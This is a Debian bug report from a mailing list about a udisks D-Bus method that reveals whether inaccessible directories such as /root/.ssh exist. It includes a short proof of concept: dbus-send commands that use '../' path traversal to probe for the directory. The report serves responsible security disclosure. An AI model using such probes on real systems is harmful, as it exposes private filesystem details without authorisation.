[Pkg-utopia-maintainers] Bug#698774: udisks leaks information about existence of directories

Timo Juhani Lindfors timo.lindfors at iki.fi
Wed Jan 23 13:09:35 UTC 2013 

Package: udisks
Version: 1.0.1+git20100614-3
Severity: important
Tags: security

It seems that org.freedesktop.UDisks.FindDeviceByDeviceFile can be
used to discover whether a directory exists even if the user should
not have any access to it:

$ ls -ld /root/.ssh
ls: cannot access /root/.ssh: Permission denied
$ ls -ld /root/.foo
ls: cannot access /root/.foo: Permission denied

$ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.ssh/../../dev/sda1"
method return sender=:1.28 -> dest=:1.3755 reply_serial=2
   object path "/org/freedesktop/UDisks/devices/sda1"

$ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.foo/../../dev/sda1"
Error org.freedesktop.UDisks.Error.Failed: No such device

This bug was inspired by bug #697464.


-- System Information:
Debian Release: 6.0.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-0.bpo.2-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages udisks depends on:
ii  dbus                  1.2.24-4+squeeze1  simple interprocess messaging syst
ii  libatasmart4          0.17+git20100219-2 ATA S.M.A.R.T. reading and parsing
ii  libc6                 2.11.3-4           Embedded GNU C Library: Shared lib
ii  libdbus-1-3           1.2.24-4+squeeze1  simple interprocess messaging syst
ii  libdbus-glib-1-2      0.88-2.1           simple interprocess messaging syst
ii  libdevmapper1.02.1    2:1.02.48-5        The Linux Kernel Device Mapper use
ii  libglib2.0-0          2.24.2-1           The GLib library of C routines
ii  libgudev-1.0-0        164-3              GObject-based wrapper library for 
ii  libparted0debian1     2.3-5              The GNU Parted disk partitioning s
ii  libpolkit-backend-1-0 0.96-4+squeeze2    PolicyKit backend API
ii  libpolkit-gobject-1-0 0.96-4+squeeze2    PolicyKit Authorization API
ii  libsgutils2-2         1.29-1             utilities for devices using the SC
ii  libudev0              164-3              libudev shared library
ii  udev                  164-3              /dev/ and hotplug management daemo

Versions of packages udisks recommends:
ii  dosfstools               3.0.9-1         utilities for making and checking 
ii  hdparm                   9.32-1          tune hard disk parameters for high
pn  mtools                   <none>          (no description available)
pn  ntfs-3g                  <none>          (no description available)
pn  ntfsprogs                <none>          (no description available)
ii  policykit-1              0.96-4+squeeze2 framework for managing administrat

Versions of packages udisks suggests:
ii  cryptsetup             2:1.1.3-4squeeze2 configures encrypted block devices
pn  mdadm                  <none>            (no description available)
pn  reiserfsprogs          <none>            (no description available)
pn  xfsprogs               <none>            (no description available)

-- no debconf information

More information about the Pkg-utopia-maintainers mailing list